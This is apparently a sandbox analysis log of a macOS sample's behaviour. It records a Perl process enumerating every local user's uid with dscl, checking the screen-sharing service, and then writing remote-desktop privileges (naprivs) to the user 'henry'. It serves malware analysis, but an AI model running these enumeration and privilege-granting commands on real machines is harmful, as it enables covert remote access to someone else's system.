Source: /usr/bin/perl5.18 (PID: 583) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ftp' uid
Source: /usr/bin/perl5.18 (PID: 584) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_gamecontrollerd' uid
Source: /usr/bin/perl5.18 (PID: 585) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_geod' uid
Source: /usr/bin/perl5.18 (PID: 586) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_hidd' uid
Source: /usr/bin/perl5.18 (PID: 587) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_iconservices' uid
Source: /usr/bin/perl5.18 (PID: 588) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installassistant' uid
Source: /usr/bin/perl5.18 (PID: 589) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_installer' uid
Source: /usr/bin/perl5.18 (PID: 590) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_jabber' uid
Source: /usr/bin/perl5.18 (PID: 591) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_admin' uid
Source: /usr/bin/perl5.18 (PID: 592) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_kadmin_changepw' uid
Source: /usr/bin/perl5.18 (PID: 593) | Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_anonymous' uid
Source: /usr/bin/perl5.18 (PID: 594)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_changepw' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 595)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kadmin' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 596)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_kerberos' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 597)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krb_krbtgt' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 598)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krbfast' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 599)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_krbtgt' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 600)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_launchservicesd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 601)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_lda' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 602)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_locationd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 603)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_lp' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 604)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mailman' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 605)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mbsetupuser' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 606)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mcxalr' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 607)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mdnsresponder' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 608)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mobileasset' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 609)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_mysql' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 610)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_netbios' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 611)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_netstatistics' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 612)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_networkd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 613)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_nsurlsessiond' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 614)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_nsurlstoraged' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 615)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_ondemand' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 616)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_postfix' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 617)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_postgres' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 618)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_qtss' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 619)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_sandbox' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 620)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_screensaver' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 621)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_scsd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 622)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_securityagent' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 623)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_serialnumberd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 624)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_softwareupdate' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 625)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_spotlight' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 626)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_sshd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 627)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_svn' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 628)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_taskgated' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 629)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_teamsserver' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 630)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_timed' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 631)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_timezone' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 632)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_tokend' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 633)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_trustevaluationagent' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 634)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_unknown' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 635)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_update_sharing' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 636)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_usbmuxd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 637)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_uucp' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 638)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_warmd' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 639)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_webauthserver' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 640)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_windowserver' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 641)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_www' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 642)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_wwwproxy' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 643)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_xcsbuildagent' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 644)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_xcscredserver' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 645)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/_xserverdocs' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 646)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/henry' uidJump to behavior
Source: /usr/bin/perl5.18 (PID: 648)Shell command executed: sh -c /bin/launchctl list com.apple.screensharing 2>/dev/nullJump to behavior
Source: /usr/bin/perl5.18 (PID: 665)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -read '/Local/Target/Users/henry' naprivs 2>/dev/nullJump to behavior
Source: /usr/bin/perl5.18 (PID: 667)Shell command executed: sh -c /usr/bin/dscl -f '/var/db/dslocal/nodes/Default' localonly -create '/Local/Target/Users/henry' naprivs '1073742079'Jump to behavior
Executes the "dscl" command in order to retrieve a list of existing users and/or other user information
Source: /bin/sh (PID: 548) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -list /Local/Target/Users
Source: /bin/sh (PID: 549) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_amavisd uid
Source: /bin/sh (PID: 550) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_analyticsd uid
Source: /bin/sh (PID: 551) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appleevents uid
Source: /bin/sh (PID: 552) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_applepay uid
Source: /bin/sh (PID: 553) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appowner uid
Source: /bin/sh (PID: 554) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appserver uid
Source: /bin/sh (PID: 555) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_appstore uid
Source: /bin/sh (PID: 556) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ard uid
Source: /bin/sh (PID: 557) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_assetcache uid
Source: /bin/sh (PID: 558) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_astris uid
Source: /bin/sh (PID: 559) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_atsserver uid
Source: /bin/sh (PID: 560) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_avbdeviced uid
Source: /bin/sh (PID: 561) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_calendar uid
Source: /bin/sh (PID: 562) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_captiveagent uid
Source: /bin/sh (PID: 563) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ces uid
Source: /bin/sh (PID: 564) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_clamav uid
Source: /bin/sh (PID: 565) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cmiodalassistants uid
Source: /bin/sh (PID: 566) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coreaudiod uid
Source: /bin/sh (PID: 567) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_coremediaiod uid
Source: /bin/sh (PID: 568) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ctkd uid
Source: /bin/sh (PID: 569) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvmsroot uid
Source: /bin/sh (PID: 570) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cvs uid
Source: /bin/sh (PID: 571) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_cyrus uid
Source: /bin/sh (PID: 572) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_datadetectors uid
Source: /bin/sh (PID: 573) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devdocs uid
Source: /bin/sh (PID: 574) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_devicemgr uid
Source: /bin/sh (PID: 575) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_displaypolicyd uid
Source: /bin/sh (PID: 576) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_distnote uid
Source: /bin/sh (PID: 577) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovecot uid
Source: /bin/sh (PID: 578) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dovenull uid
Source: /bin/sh (PID: 579) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_dpaudio uid
Source: /bin/sh (PID: 580) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_eppc uid
Source: /bin/sh (PID: 581) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_findmydevice uid
Source: /bin/sh (PID: 582) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_fpsd uid
Source: /bin/sh (PID: 583) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ftp uid
Source: /bin/sh (PID: 584) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_gamecontrollerd uid
Source: /bin/sh (PID: 585) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_geod uid
Source: /bin/sh (PID: 586) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_hidd uid
Source: /bin/sh (PID: 587) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_iconservices uid
Source: /bin/sh (PID: 588) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installassistant uid
Source: /bin/sh (PID: 589) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_installer uid
Source: /bin/sh (PID: 590) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_jabber uid
Source: /bin/sh (PID: 591) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_admin uid
Source: /bin/sh (PID: 592) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_kadmin_changepw uid
Source: /bin/sh (PID: 593) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_anonymous uid
Source: /bin/sh (PID: 594) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_changepw uid
Source: /bin/sh (PID: 595) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kadmin uid
Source: /bin/sh (PID: 596) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_kerberos uid
Source: /bin/sh (PID: 597) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krb_krbtgt uid
Source: /bin/sh (PID: 598) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbfast uid
Source: /bin/sh (PID: 599) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_krbtgt uid
Source: /bin/sh (PID: 600) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_launchservicesd uid
Source: /bin/sh (PID: 601) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_lda uid
Source: /bin/sh (PID: 602) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_locationd uid
Source: /bin/sh (PID: 603) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_lp uid
Source: /bin/sh (PID: 604) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mailman uid
Source: /bin/sh (PID: 605) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mbsetupuser uid
Source: /bin/sh (PID: 606) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mcxalr uid
Source: /bin/sh (PID: 607) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mdnsresponder uid
Source: /bin/sh (PID: 608) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mobileasset uid
Source: /bin/sh (PID: 609) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_mysql uid
Source: /bin/sh (PID: 610) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_netbios uid
Source: /bin/sh (PID: 611) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_netstatistics uid
Source: /bin/sh (PID: 612) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_networkd uid
Source: /bin/sh (PID: 613) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_nsurlsessiond uid
Source: /bin/sh (PID: 614) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_nsurlstoraged uid
Source: /bin/sh (PID: 615) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_ondemand uid
Source: /bin/sh (PID: 616) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_postfix uid
Source: /bin/sh (PID: 617) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_postgres uid
Source: /bin/sh (PID: 618) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_qtss uid
Source: /bin/sh (PID: 619) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_sandbox uid
Source: /bin/sh (PID: 620) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_screensaver uid
Source: /bin/sh (PID: 621) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_scsd uid
Source: /bin/sh (PID: 622) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_securityagent uid
Source: /bin/sh (PID: 623) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_serialnumberd uid
Source: /bin/sh (PID: 624) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_softwareupdate uid
Source: /bin/sh (PID: 625) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_spotlight uid
Source: /bin/sh (PID: 626) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_sshd uid
Source: /bin/sh (PID: 627) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_svn uid
Source: /bin/sh (PID: 628) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_taskgated uid
Source: /bin/sh (PID: 629) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_teamsserver uid
Source: /bin/sh (PID: 630) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_timed uid
Source: /bin/sh (PID: 631) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_timezone uid
Source: /bin/sh (PID: 632) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_tokend uid
Source: /bin/sh (PID: 633) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_trustevaluationagent uid
Source: /bin/sh (PID: 634) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_unknown uid
Source: /bin/sh (PID: 635) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_update_sharing uid
Source: /bin/sh (PID: 636) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_usbmuxd uid
Source: /bin/sh (PID: 637) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_uucp uid
Source: /bin/sh (PID: 638) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_warmd uid
Source: /bin/sh (PID: 639) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_webauthserver uid
Source: /bin/sh (PID: 640) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_windowserver uid
Source: /bin/sh (PID: 641) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_www uid
Source: /bin/sh (PID: 642) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_wwwproxy uid
Source: /bin/sh (PID: 643) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xcsbuildagent uid
Source: /bin/sh (PID: 644) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xcscredserver uid
Source: /bin/sh (PID: 645) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/_xserverdocs uid
Source: /bin/sh (PID: 646) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry uid
Source: /bin/sh (PID: 666) | Security executable: /usr/bin/dscl -> /usr/bin/dscl -f /var/db/dslocal/nodes/Default localonly -read /Local/Target/Users/henry naprivs
